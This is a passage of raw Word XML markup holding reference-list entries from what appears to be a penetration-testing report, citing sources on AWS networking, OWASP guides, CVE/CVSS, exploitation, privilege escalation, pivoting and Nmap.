          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="210" w:name="resource12"/>
      <w:bookmarkEnd w:id="209"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[12] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Enable internet access for a VPC using an internet gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Internet gateway basics</w:t>
      </w:r>
      <w:r w:rsidR="004C316F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:i/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004C316F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:iCs/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[Online]. Docs.aws.amazon.com</w:t>
      </w:r>
      <w:r w:rsidR="00B37925" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004C316F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00B37925" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">access 24 December </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2025</w:t>
      </w:r>
      <w:r w:rsidR="004C316F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]. A</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vailable:</w:t>
      </w:r>
      <w:r w:rsidR="00B37925" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId55" w:history="1">
        <w:r w:rsidR="00B37925" w:rsidRPr="00D77DFE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://docs.aws.amazon.com/vpc/latest/userguide/VPC_Internet_Gateway.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkStart w:id="211" w:name="resource13"/>
    <w:bookmarkEnd w:id="210"/>
    <w:p w14:paraId="38F46278" w14:textId="6C3F8623" w:rsidR="006B6855" w:rsidRPr="00D77DFE" w:rsidRDefault="006B6855" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLine="3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lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00495CED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>HYPERLINK "file://C:\\Users\\aryba\\AppData\\Local\\Temp\\pid-29092\\[13] Understanding the Five Phases of the Penetration Testing Process [Online]. eccouncil.org [access 28 December 2025]. Available: https:\\www.eccouncil.org\\cybersecurity-exchange\\penetration-testing\\penetration-testing-phases\\"</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[13] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Understanding the Five Phases of the Penetration Testing Process</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[Online]. eccouncil.org [access 28 December 2025]. Available: https://www.eccouncil.org/cybersecurity-exchange/penetration-testing/penetration-testing-phases/</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="211"/>
    <w:p w14:paraId="2BFB1594" w14:textId="2994C464" w:rsidR="006B6855" w:rsidRPr="00D77DFE" w:rsidRDefault="006B6855" w:rsidP="005651D6">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2" w:name="resource14"/>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"file://C:\\Users\\aryba\\AppData\\Local\\Temp\\pid-29092\\[14] \“OWASP Testing Guide\”, Version 4.0 - Understand the Scope of Security Page.14 [Online].owasp.org [access 30 December 2025]. Available: https:\\owasp.org\\www-project-web-security-testing-guide\\assets\\archive\\OWASP_Testing_Guide_v4.pdf"</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[14]</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b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“OWASP Testing Guide”, Version 4.0 - Understand the Scope of Security Page.14</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Online].owasp.org [access 30 December 2025]. Available:</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sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://owasp.org/www-project-web-security-testing-guide/assets/archive/OWASP_Testing_Guide_v4.pdf</w:t>
      </w:r>
      <w:bookmarkEnd w:id="212"/>
    </w:p>
    <w:p w14:paraId="30E9A972" w14:textId="3D2A5095" w:rsidR="00FC6DB3" w:rsidRPr="00D77DFE" w:rsidRDefault="006B6855" w:rsidP="00556DBD">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3" w:name="resource15"/>
      <w:r w:rsidR="00FC6DB3"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"C:\\Users\\aryba\\AppData\\Local\\Temp\\pid-29092\\[15] What Are The Different Types of Penetration Testing? [Online].purplesec.us [access 25 December 2025]. Available: https:\\purplesec.us\\learn\\types-penetration-testing\\"</w:instrText>
      </w:r>
      <w:r w:rsidR="00FC6DB3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00FC6DB3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00FC6DB3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[15] </w:t>
      </w:r>
      <w:r w:rsidR="00FC6DB3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>What Are The Different Types of Penetration Testing?</w:t>
      </w:r>
      <w:r w:rsidR="00FC6DB3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Online].purplesec.us [access 25 December 2025]. Available:</w:t>
      </w:r>
      <w:r w:rsidR="00FC6DB3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC6DB3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://purplesec.us/learn/types-penetration-testing/</w:t>
      </w:r>
      <w:bookmarkEnd w:id="213"/>
    </w:p>
    <w:p w14:paraId="4CDEC154" w14:textId="1D40F354" w:rsidR="00FC6DB3" w:rsidRPr="00D77DFE" w:rsidRDefault="00FC6DB3" w:rsidP="00FC6DB3">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4" w:name="resource16"/>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"C:\\Users\\aryba\\AppData\\Local\\Temp\\pid-29092\\[16] proof of concept (PoC) exploit [Online].techtarget.com [access 25 December 2025]. Available: https:\\www.techtarget.com\\searchsecurity\\definition\\proof-of-concept-PoC-exploit"</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[16] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>proof of concept (PoC) exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[Online].techtarget.com [access 25 December 2025]. Available: https://www.techtarget.com/searchsecurity/definition/proof-of-concept-PoC-exploit</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="214"/>
    <w:p w14:paraId="1F258AEC" w14:textId="4837828A" w:rsidR="00FC6DB3" w:rsidRPr="00D77DFE" w:rsidRDefault="00FC6DB3" w:rsidP="00CA48B4">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="215" w:name="Resource17"/>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"C:\\Users\\aryba\\AppData\\Local\\Temp\\pid-29092\\[17] All about Common Vulnerabilities Exposures (CVE) [Online].httpcs.com [access 25 December 2025]. Available: https:\\www.httpcs.com\\en\\cve-common-vulnerabilities-exposures"</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[17] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>All about Common Vulnerabilities Exposures (CVE)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Online].httpcs.com [access 25 December 2025]. Available: https://www.httpcs.com/en/cve-common-vulnerabilities-exposures</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="215"/>
    <w:p w14:paraId="60ABE6F4" w14:textId="0547EEBF" w:rsidR="00FC6DB3" w:rsidRPr="00D77DFE" w:rsidRDefault="00FC6DB3" w:rsidP="00CA48B4">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6" w:name="Resource18"/>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"C:\\Users\\aryba\\AppData\\Local\\Temp\\pid-29092\\[18] Common Vulnerability Scoring System version 4.0: User Guide [Online]. First.org. [access 25 December 2025]. Available: https:\\www.first.org\\cvss\\v4-0\\user-guide"</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[18] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Common Vulnerability Scoring System version 4.0: User Guide</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Online]. First.org. [access 25 December 2025]. Available: https://www.first.org/cvss/v4-0/user-guide</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="216"/>
    <w:p w14:paraId="314AA64C" w14:textId="35A45BF3" w:rsidR="00FC6DB3" w:rsidRPr="00D77DFE" w:rsidRDefault="00FC6DB3" w:rsidP="007B11D8">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7" w:name="Resource19"/>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"C:\\Users\\aryba\\AppData\\Local\\Temp\\pid-29092\\[19] Exploitation in Penetration Testing [Online]. Vertexcybersecurity.com.au. [access 25 Decemeber 2025]. Available: https:\\www.vertexcybersecurity.com.au\\exploitation-in-penetration-testing\\"</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[19] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Exploitation in Penetration Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Online]. Vertexcybersecurity.com.au. [access 25 Decemeber 2025]. Available: https://www.vertexcybersecurity.com.au/exploitation-in-penetration-testing/</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="217"/>
    <w:p w14:paraId="626BFEB2" w14:textId="242EA12E" w:rsidR="00FC6DB3" w:rsidRPr="00D77DFE" w:rsidRDefault="00FC6DB3" w:rsidP="007B11D8">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8" w:name="Resource20"/>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"C:\\Users\\aryba\\AppData\\Local\\Temp\\pid-29092\\[20] What is a Payload in Cybersecurity? [Online].cymulate.com [access 25 December 2025]. Available: https:\\cymulate.com\\cybersecurity-glossary\\payload\\"</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[20] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>What is a Payload in Cybersecurity?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[Online].cymulate.com [access 25 December 2025]. Available: https://cymulate.com/cybersecurity-glossary/payload/</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="218"/>
    <w:p w14:paraId="6A78891F" w14:textId="3CDA71DD" w:rsidR="00FC6DB3" w:rsidRPr="00D77DFE" w:rsidRDefault="00FC6DB3" w:rsidP="00FC6DB3">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19" w:name="resource21"/>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"C:\\Users\\aryba\\AppData\\Local\\Temp\\pid-29092\\[21] What Is Privilege Escalation? [Online].eccouncil.org. [access  27 December 2025]. Available: https:\\www.eccouncil.org\\cybersecurity-exchange\\penetration-testing\\privilege-escalations-attacks\\"</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[21] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>What Is Privilege Escalation?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Online].eccouncil.org. [access  27 December 2025].</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE" w:rsidDel="00FC6DB3">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Available: https://www.eccouncil.org/cybersecurity-exchange/penetration-testing/privilege-escalations-attacks/</w:t>
      </w:r>
      <w:bookmarkEnd w:id="219"/>
    </w:p>
    <w:p w14:paraId="26677C9C" w14:textId="69E310CC" w:rsidR="00FC6DB3" w:rsidRPr="00D77DFE" w:rsidRDefault="00FC6DB3" w:rsidP="006811F2">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"C:\\Users\\aryba\\AppData\\Local\\Temp\\pid-29092\\[22] Pivoting to Access Networks in Penetration Testing [Online]. Eccouncil.org [access October 4, 2025]. Available : https:\\www.eccouncil.org\\cybersecurity-exchange\\penetration-testing\\pivoting-penetration-testing\\"</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[22] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Pivoting to Access Networks in Penetration Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Online]. Eccouncil.org [access October 4, 2025]. Available : https://www.eccouncil.org/cybersecurity-exchange/penetration-testing/pivoting-penetration-testing/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294A03D7" w14:textId="70733C7B" w:rsidR="00FC6DB3" w:rsidRPr="00D77DFE" w:rsidRDefault="00FC6DB3" w:rsidP="00FC6DB3">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lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="220" w:name="resource23"/>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"C:\\Users\\aryba\\AppData\\Local\\Temp\\pid-29092\\[23] OWASP Top 10:2025 [Online]. Owasp.org [access 3 October, 2025]. Available: https:\\owasp.org\\Top10\\2025\\"</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[23]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>OWASP Top 10:2025</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Online]. Owasp.org [access 3 October, 2025]. Available: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://owasp.org/Top10/2025/</w:t>
      </w:r>
      <w:bookmarkEnd w:id="220"/>
    </w:p>
    <w:p w14:paraId="3346D810" w14:textId="06E2D679" w:rsidR="006811F2" w:rsidRPr="00D77DFE" w:rsidRDefault="00FC6DB3" w:rsidP="006811F2">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end"/>
      </w:r>
      <w:bookmarkStart w:id="221" w:name="resource24"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00495CED" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>HYPERLINK "C:\\Users\\aryba\\AppData\\Local\\Temp\\pid-29092\\[24] Nmap: Discover your network [Online]. Nmap.org [access 3 October, 2025]. Available: https:\\nmap.org\\"</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
